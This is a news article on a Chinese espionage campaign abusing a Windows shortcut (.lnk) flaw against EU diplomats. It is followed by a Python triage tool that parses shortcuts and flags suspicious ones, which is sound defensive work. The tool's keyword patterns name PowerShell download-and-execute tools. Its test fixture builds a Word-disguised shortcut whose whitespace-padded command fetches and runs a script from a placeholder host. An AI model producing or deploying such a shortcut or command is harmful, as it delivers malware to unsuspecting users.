Cyberwarfare / Nation-State Attacks, Fraud Management & Cybercrime
Chinese Hackers Exploit Windows Vulnerability Against European Diplomats

Security researchers report that Chinese nation-state hackers are actively exploiting a Windows vulnerability to target European diplomatic missions. Microsoft has said the flaw, tracked as CVE-2025-9491, does not warrant a patch at this time, despite its widespread exploitation.
During September and October, managed detection and response company Arctic Wolf observed a group tracked as UNC6384 attempting to compromise Hungarian and Belgian diplomatic entities within the European Union. The campaign abuses a Windows flaw in the handling of .lnk files, the desktop shortcuts that can be made to launch commands the user never intended to run.
The attackers used social engineering to lure victims into opening malicious .lnk files disguised as ordinary documents. Once opened, the shortcut runs a command that downloads malware. Previous reports show that similar .lnk flaws have also been exploited by North Korean and Russian state-sponsored groups.
Despite having been aware of the vulnerability since at least September 2024, Microsoft classified it as low severity and has repeatedly said it does not plan to release a fix. Its position is that users see multiple security warnings when opening such a file and that the risk is therefore manageable; it urges users not to open files from unknown sources and notes that Microsoft Defender already detects this kind of threat.
Trend Micro's analysis characterizes the vulnerability as a substantial risk to organizations and advises them to block execution of shortcut files from untrusted origins as a precaution. The tactics in this attack map to the MITRE ATT&CK framework: initial access via a spearphishing attachment (T1566.001), user execution of a malicious file (T1204.002), and DLL side-loading (a Hijack Execution Flow technique, T1574) for defense evasion and persistence.
The operation targeted diplomats with spear-phishing emails whose attachments posed as agendas for legitimate European Commission meetings. The final payload was a variant of PlugX, a backdoor used in Chinese cyber-espionage since 2008. Evidence suggests the group may also be linked to Mustang Panda, another Chinese threat actor focused on government intrusions.
On execution, the shortcut decodes an embedded archive and uses PowerShell to install the malware while opening a decoy document so the victim sees nothing unusual. This PlugX variant also takes extra steps to hide itself, creating hidden directories and altering its working files, which complicates detection.
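The shortcut abuse described above lends itself to static triage: a .lnk is a documented binary format (MS-SHLLINK), so the target, arguments and icon of a shortcut can be read without ever opening it. The Python below is an added example, not code from the article, Arctic Wolf or Trend Micro. It parses the ShellLinkHeader and StringData of a shortcut and flags the traits this kind of lure depends on: a living-off-the-land target such as cmd.exe or powershell.exe, download or decode keywords in the arguments, an icon borrowed from an Office application to pose as a document, and long runs of whitespace in the arguments (the flaw as publicly described is that such padding hides the real command in the shortcut's Properties dialog; the 16-character threshold is my assumption). The two sample shortcuts, their file names and the hostname files.example.invalid are constructed for this example, not taken from the campaign.

```python
"""Static triage of Windows Shell Link (.lnk) files (MS-SHLLINK layout).

Added example: parses the fixed header and the StringData section of a
shortcut and applies heuristics for document-lookalike downloaders.
All sample shortcuts below are constructed fixtures, not real malware.
"""
import re
import struct

# LinkCLSID 00021401-0000-0000-C000-000000000046 in on-disk byte order.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData fields appear in exactly this order when their flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)


def is_shell_link(data: bytes) -> bool:
    """True if the blob starts with a valid 0x4C-byte ShellLinkHeader."""
    return len(data) >= 0x4C and data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LNK_CLSID


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a .lnk as a dict (absent ones are '')."""
    if not is_shell_link(data):
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", data, 20)
    off = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (u16) then the IDList
        (size,) = struct.unpack_from("<H", data, off)
        off += 2 + size
    if flags & HAS_LINK_INFO:                # LinkInfoSize (u32) includes itself
        (size,) = struct.unpack_from("<I", data, off)
        off += size
    width = 2 if flags & IS_UNICODE else 1   # UTF-16LE or ANSI code page
    fields = {}
    for flag, key in STRING_FIELDS:
        if not flags & flag:
            fields[key] = ""
            continue
        (count,) = struct.unpack_from("<H", data, off)   # CountCharacters, no NUL
        off += 2
        raw = data[off:off + count * width]
        off += count * width
        fields[key] = raw.decode("utf-16-le" if width == 2 else "cp1252", errors="replace")
    return fields


LOLBIN_RE = re.compile(
    r"\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|msiexec)(\.exe)?\b",
    re.IGNORECASE)
DOWNLOAD_RE = re.compile(
    r"(https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"
    r"|frombase64string|-e(nc|ncodedcommand)?\s|-urlcache)", re.IGNORECASE)
DOC_ICON_RE = re.compile(r"(winword|excel|powerpnt|acrord32|acrobat|\.docx?\b|\.pdf\b|\.xlsx?\b)", re.IGNORECASE)
PADDING_RE = re.compile(r"[ \t\r\n\x0b\x0c]{16,}")   # threshold is an assumption


def triage(fields: dict) -> list:
    """Return finding tags for one parsed shortcut (empty list means nothing flagged)."""
    findings = []
    target = " ".join(fields[k] for k in ("relative_path", "working_dir", "arguments"))
    if LOLBIN_RE.search(target):
        findings.append("lolbin-target")
    if DOWNLOAD_RE.search(fields["arguments"]):
        findings.append("download-hint")
    if PADDING_RE.search(fields["arguments"]):
        findings.append("whitespace-padding")
    if findings and DOC_ICON_RE.search(fields["icon_location"]):
        findings.append("document-disguise")   # icon says document, target says shell
    return findings


def build_lnk(**strings: str) -> bytes:
    """Build a minimal Unicode .lnk carrying only StringData (test fixture)."""
    flags = IS_UNICODE
    body = b""
    for flag, key in STRING_FIELDS:
        value = strings.get(key, "")
        if value:
            flags |= flag
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    # LinkFlags, FileAttributes(ARCHIVE), 3 timestamps, FileSize, IconIndex,
    # ShowCommand(SW_SHOWNORMAL), HotKey, Reserved1..3
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack(
        "<IIQQQIiIHHII", flags, 0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + body + b"\x00\x00\x00\x00"   # TerminalBlock closes ExtraData


# Constructed samples: names, paths and hostname are invented for this example.
MALICIOUS_LNK = build_lnk(
    name="Agenda - Working Group Meeting.docx",
    relative_path="..\\..\\..\\Windows\\System32\\cmd.exe",
    arguments=" " * 300 + "/c powershell -w hidden -nop -c \"iwr http://files.example.invalid/a.ps1 | iex\"",
    icon_location="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
)
BENIGN_LNK = build_lnk(
    relative_path="..\\..\\Program Files\\Notepad++\\notepad++.exe",
    working_dir="C:\\Program Files\\Notepad++",
)

if __name__ == "__main__":
    for label, blob in (("malicious", MALICIOUS_LNK), ("benign", BENIGN_LNK)):
        f = parse_lnk(blob)
        print(label, triage(f), repr(f["arguments"].strip()[:60]))
```

Against real files, call `triage(parse_lnk(open(path, "rb").read()))`. The parser skips the LinkTargetIDList and LinkInfo sections rather than decoding them, so a shortcut whose target is stored only in the ID list shows an empty relative_path and is judged on its arguments and icon alone; the keyword lists are a starting point to tune on your own shortcut population, not a substitute for the Defender and shortcut-blocking controls the article mentions.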
The rapid adaptation shown by these espionage operations plays out against broader geopolitical tensions between Europe and China, heightened by China's role in ongoing international conflicts. This persistent threat underlines the need for organizations to stay vigilant against sophisticated intrusions.